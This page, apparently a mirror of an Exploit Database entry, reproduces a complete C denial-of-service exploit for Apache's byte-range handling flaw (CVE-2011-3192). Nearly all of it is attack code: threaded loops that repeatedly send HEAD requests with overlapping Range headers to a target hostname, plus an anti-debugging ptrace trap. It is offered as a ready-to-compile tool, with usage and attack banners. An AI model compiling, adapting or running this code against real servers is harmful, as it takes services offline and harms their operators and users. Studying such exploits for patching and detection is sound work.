Apache – Denial of Service

• Exploit Database
• 108 阅读

• 作者： Ramon de C Valle
  日期： 2011-12-09
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/18221/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

  /* * This is a reverse engineered version of the exploit for CVE-2011-3192 made * by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz). * Copyright 2011 Ramon de C Valle <rcvalle@redhat.com> * * Compile with the following command: * gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c */   #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ptrace.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <unistd.h> #include <pthread.h>   void ptrace_trap(void) __attribute__ ((constructor));   void ptrace_trap(void) { if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) { write(fileno(stdout), "Segmentation fault\n", 19); exit(-1); } }   void w4rn41dun14mu(int attr, int fg, int bg) { char command[13];   sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40); printf("%s", command); }   void banner() { w4rn41dun14mu(0, 1, 0); fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1, stdout); }   void gime_er_mas() { printf("%c%s", 0x1b, "[2J"); printf("%c%s", 0x1b, "[1;1H"); puts("\nsorry dude there&apos;s an error..."); }   struct thread_info { pthread_t thread_id; int thread_num; char *argv_string; };   static void * thread_start(void *arg) { struct thread_info *tinfo = (struct thread_info *) arg; char hostname[64]; int j;   strcpy(hostname, tinfo->argv_string);   j = 0; while (j != 10) { struct addrinfo hints; struct addrinfo *result, *rp; int sfd, s; ssize_t nwritten;   memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_flags = 0; hints.ai_protocol = 0;   s = getaddrinfo(hostname, "http", &hints, &result); if (s != 0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s)); exit(EXIT_FAILURE); }   for (rp = result; rp != NULL; rp = rp->ai_next) { sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol); if (sfd == -1) continue;   if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1) close(sfd); }   if (result != NULL) freeaddrinfo(result);   nwritten = write(sfd, "HEAD / HTTP/1.1\n" "Host:localhost\n" "Range:bytes=0-,0-\n" "Accept-Encoding: gzip", 71); if (nwritten == -1) close(sfd);   usleep(300000);   j++; }   return 0; }   int main(int argc, char *argv[]) { int i; struct thread_info tinfo;   banner();   if (argc <= 1) { w4rn41dun14mu(0, 2, 0); fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout); return 0; }   w4rn41dun14mu(0, 3, 0); printf("[+] Attacking %s please waitin minutes ...\n", argv[1]);   while (1) { i = 0; while (i != 50) { tinfo.thread_num = i; tinfo.argv_string = argv[1];   pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);   usleep(500000);   i++; } } }